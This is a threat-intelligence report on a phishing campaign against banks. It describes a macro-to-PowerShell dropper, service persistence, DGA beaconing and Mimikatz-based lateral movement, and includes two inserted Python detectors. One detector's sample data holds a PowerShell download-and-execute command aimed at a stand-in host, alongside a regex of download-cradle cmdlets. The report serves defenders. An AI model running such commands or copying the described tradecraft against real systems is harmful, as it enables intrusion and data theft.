In-Depth Analysis of a Sophisticated Phishing Campaign Leveraging Malware as a Service

Alex Morgan — Threat Intelligence Analyst

Key Takeaways

  • A phishing campaign targeting financial institutions utilized a malware-as-a-service model to deploy advanced payloads.
  • The actor relied on phishing to achieve initial access, primarily via malicious email attachments.
  • Command and Control communications were established through a series of encrypted beacons to evade detection.

Executive Summary

Our investigation into a recent phishing campaign revealed sophisticated techniques employed by threat actors targeting financial institutions. This campaign used a malware-as-a-service framework to deliver payloads that facilitated extensive network infiltration. We observed initial access achieved through crafted emails containing malicious attachments, which led to the execution of a dropper. Subsequent actions were characterized by a range of lateral movement strategies as the actors deployed various tools to maintain persistence and control over the victim’s environment.

Initial Access

The attack commenced with an email campaign that impersonated a legitimate financial service provider. The email included an attachment labeled as a transaction document — specifically named Invoice_2023.docx. Our analysis revealed that when the document was opened, a Word macro launched a PowerShell script. This script downloaded the malicious payload from a remote server, a classic pairing of phishing with malware delivery.

Execution & Persistence

Once downloaded, the malware installed itself on the victim’s system under the path C:\Program Files\FinancialApp\svc.exe. This binary established persistence by registering itself as a Windows service, ensuring that the implant would execute on system startup. Our investigation revealed that the malware could invoke additional payloads based on incoming commands from the actor’s Command and Control (C2) infrastructure.

Command and Control

The C2 communication pattern was particularly sophisticated, using a domain generation algorithm (DGA) to regularly rotate endpoint domains. We identified that the implant communicated over HTTPS, using TLS to encrypt its traffic, which significantly complicated detection efforts. The beacons were observed reaching out to domains such as randomletters1234.com and secure-finance.xyz, checking in every 5 minutes. This allowed the actor to deliver updates and additional commands while minimizing the risk of detection.
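A regular check-in interval is itself a detectable signal even when the traffic is TLS-encrypted. The following is an added example (not from the original report) that scans constructed proxy log lines for client/host pairs contacted at a near-constant cadence matching the 5-minute beacon described above; the log format, client address and the cdn.example.net host are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log lines: timestamp, client, destination host, status.
# Sample values only; the host is the first domain named in the report.
SAMPLE_LOG = """\
2023-09-12T10:00:03Z 10.20.30.41 randomletters1234.com 200
2023-09-12T10:01:10Z 10.20.30.41 cdn.example.net 200
2023-09-12T10:05:04Z 10.20.30.41 randomletters1234.com 200
2023-09-12T10:10:02Z 10.20.30.41 randomletters1234.com 200
2023-09-12T10:13:45Z 10.20.30.41 cdn.example.net 200
2023-09-12T10:15:05Z 10.20.30.41 randomletters1234.com 200
2023-09-12T10:20:03Z 10.20.30.41 randomletters1234.com 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3})$")

def parse(log):
    """Yield (client, host, timestamp) for each well-formed line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group(2), m.group(3), datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")

def find_beacons(log, expected_period=300.0, tolerance=0.1, min_hits=4):
    """Return (client, host, mean_gap_seconds) for pairs whose requests recur
    at roughly expected_period (the report's 5-minute check-in) with low jitter."""
    seen = defaultdict(list)
    for client, host, ts in parse(log):
        seen[(client, host)].append(ts)
    hits = []
    for (client, host), times in seen.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg == 0:  # duplicate timestamps are not a cadence, skip
            continue
        on_period = all(abs(g - expected_period) <= tolerance * expected_period for g in gaps)
        if on_period and pstdev(gaps) / avg < tolerance:
            hits.append((client, host, round(avg, 1)))
    return hits
```

Implants that randomize their sleep interval will need a wider tolerance, and the cadence check should be paired with destination reputation or DGA-style domain scoring to keep false positives from legitimate pollers low.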

Lateral Movement & Discovery

Once inside the network, the actor employed a multi-faceted approach to lateral movement, using Mimikatz for credential dumping to extract passwords from memory. We detected several attempts to access administrative shares with the harvested credentials, specifically over SMB, using the net use command to connect to remote systems. This activity targeted servers hosting sensitive financial data, extending the actor’s foothold across the compromised network.

Impact & Objectives

The ultimate goal of this operation appeared to be data exfiltration, particularly the extraction of customer information and transaction records. During our investigation, we confirmed that the malware had the capability to capture screenshots and log keystrokes, indicative of a broader strategy to pilfer sensitive data from end-users. Additionally, we observed the actor testing various exfiltration methods as they tried to funnel data through encrypted channels, highlighting advanced planning and execution throughout the attack lifecycle.

MITRE ATT&CK Mapping

  • T1566 – Phishing: Utilized deceptive emails with malicious attachments to gain initial access.
  • T1059.001 – PowerShell: Employed PowerShell scripts to execute downloads and commands on the victim’s machine.
  • T1071.001 – Application Layer Protocol: Web Protocols: Used HTTPS traffic for Command and Control communications to encrypt data transmissions.
  • T1021.001 – Remote Services: SMB/Windows Admin Shares: Executed lateral movement strategies using stolen credentials across shared resources.

Detection Opportunities

  • Implement email filtering solutions to detect and block phishing emails based on known patterns.
  • Monitor for suspicious PowerShell commands, particularly those attempting to download executables from untrusted sources.
  • Utilize network monitoring tools to identify anomalous SMB traffic or unusual connection attempts to administrative shares.
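The PowerShell and persistence observations above chain together: a download cradle launched from Word, followed shortly by a new Windows service. The following is an added example (not from the original report) that correlates constructed Sysmon process-creation and System 7045 service-install records to flag that sequence; the host names, timestamps, parent paths and the placeholder.invalid URL are assumptions, while the svc.exe path is the one the report names.

```python
import re
from datetime import datetime, timedelta

# Constructed Windows event records: Sysmon EID 1 (process create) and System
# EID 7045 (service installed). Sample values, not indicators from the report,
# except the svc.exe path, which is the implant location the report names.
EVENTS = [
    {"time": "2023-09-12T09:58:10Z", "host": "WKS-17", "eid": 1,
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "powershell -c IEX (New-Object Net.WebClient)"
                ".DownloadString('https://placeholder.invalid/p')"},
    {"time": "2023-09-12T09:59:02Z", "host": "WKS-17", "eid": 7045,
     "service": "FinancialAppSvc", "image": r"C:\Program Files\FinancialApp\svc.exe"},
    {"time": "2023-09-12T11:30:00Z", "host": "WKS-22", "eid": 1,
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell Get-Process | Sort-Object CPU"},
    {"time": "2023-09-12T12:00:00Z", "host": "WKS-22", "eid": 7045,
     "service": "BackupAgent", "image": r"C:\Program Files\Backup\agent.exe"},
]

# Download-cradle cmdlets/methods typical of PowerShell droppers (case-insensitive).
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)
OFFICE_RE = re.compile(r"\\(WINWORD|EXCEL|POWERPNT)\.EXE$", re.I)

def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")

def is_download_cradle(ev):
    """Sysmon EID 1 where PowerShell is run with a download cradle in its command line."""
    return (ev["eid"] == 1 and ev["cmdline"].lower().startswith("powershell")
            and CRADLE_RE.search(ev["cmdline"]) is not None)

def correlate(events, window=timedelta(minutes=10)):
    """Flag service installs (EID 7045) that follow a PowerShell download cradle on
    the same host within `window`: the dropper -> Windows-service persistence chain."""
    cradles = [e for e in events if is_download_cradle(e)]
    alerts = []
    for ev in events:
        if ev["eid"] != 7045:
            continue
        t = parse_time(ev["time"])
        for c in cradles:
            delta = t - parse_time(c["time"])
            if c["host"] == ev["host"] and timedelta(0) <= delta <= window:
                alerts.append({"host": ev["host"], "service": ev["service"],
                               "image": ev["image"],
                               "office_parent": bool(OFFICE_RE.search(c["parent"]))})
                break
    return alerts
```

The office_parent flag raises the alert's priority, since PowerShell spawned by Word matches the macro-based initial access described in this report rather than routine administration.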

Analyst Notes

This campaign highlights the continuing evolution of threat actors in utilizing sophisticated techniques combined with commodity tools for executing their operations. The reliance on an established malware-as-a-service model permits adversaries to lower the barrier to entry into cyberattacks, making such tactics increasingly prevalent across various sectors. Continuous monitoring, user education on phishing attempts, and robust response strategies are essential for mitigating the impact of similar threats.

Source: Original Report